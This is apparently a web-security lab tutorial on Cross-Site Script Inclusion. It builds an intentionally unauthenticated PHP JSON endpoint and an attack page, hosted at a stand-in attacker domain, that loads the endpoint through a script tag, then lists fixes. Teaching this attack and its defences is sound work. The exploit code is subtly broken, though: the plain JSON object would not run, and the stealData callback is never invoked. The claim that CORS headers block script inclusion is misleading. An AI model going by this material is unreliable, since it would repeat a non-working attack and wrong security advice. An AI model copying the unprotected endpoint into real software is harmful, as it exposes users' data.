Objective
Understand and exploit Cross-Site Script Inclusion (XSSI) vulnerabilities to steal sensitive information exposed through JSON responses and learn effective mitigation strategies.
Scenario
You’re performing a security assessment on a web application that serves sensitive user data via a JSON API endpoint. Due to a lack of proper access controls and security headers, this endpoint can be exploited through a Cross-Site Script Inclusion (XSSI) attack. Your goal is to exploit this vulnerability to extract sensitive data and understand how to secure applications against such attacks.
Lab Setup
Prerequisites:
- Basic knowledge of HTML, JavaScript, and JSON.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for JSON Response
Create a file data.php:
<?php
header('Content-Type: application/json');
$user_data = [
"username" => "victim",
"email" => "[email protected]",
"balance" => "1000"
];
echo json_encode($user_data);
?>Running the Application
Start your Apache server.
Place data.php in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/data.php in your browser.
Expected Result:
{
"username": "victim",
"email": "[email protected]",
"balance": "1000"
}
Exploitation Steps
Crafting the Malicious Page
Create a file xssi_attack.html with the following content:
<html>
<body>
<h2>Stealing JSON Data...</h2>
<script>
function stealData(data) {
document.body.innerHTML += '<pre>' + data + '</pre>';
}
</script>
<script src="http://localhost/data.php"></script>
</body>
</html>Host xssi_attack.html on any server (e.g., http://attacker.com/xssi_attack.html).
When a victim visits the attacker’s page, the JSON data from data.php will be displayed.
Expected Result:
- The sensitive JSON data appears on the attacker’s page, demonstrating the data leak.
Explanation
- Browsers treat
<script>tags as JavaScript, allowing JSON data to be loaded from another domain without same-origin restrictions.
Solution and Prevention
Problem Analysis
- The server returns JSON data without any protection, allowing cross-domain inclusion.
Fixing the Vulnerability
Set X-Content-Type-Options Header
Prevent browsers from interpreting JSON as JavaScript:
<?php
header('Content-Type: application/json');
header('X-Content-Type-Options: nosniff');
$user_data = [
"username" => "victim",
"email" => "[email protected]",
"balance" => "1000"
];
echo json_encode($user_data);
?>Require Authentication for JSON Endpoints
Implement session checks or API tokens to restrict access.
session_start();
if (!isset($_SESSION['user_id'])) {
http_response_code(403);
echo json_encode(["error" => "Unauthorized access"]);
exit();
}Prefix JSON Responses with Non-Executable Content
Add a harmless prefix to prevent script execution:
echo ")]}',\n";
echo json_encode($user_data);Use CORS Policies
Set Cross-Origin Resource Sharing (CORS) headers to control access:
header('Access-Control-Allow-Origin: https://trusted-domain.com');Testing After Fix
- Reload the attack page (
xssi_attack.html). - Observe that the JSON data is no longer exposed or processed due to the security headers and access controls.
Conclusion
In this lab, you exploited a Cross-Site Script Inclusion (XSSI) vulnerability to steal sensitive data from a JSON endpoint. You also learned how to secure JSON responses using security headers, access controls, and data protection techniques to prevent unauthorized data exposure.
0 Comments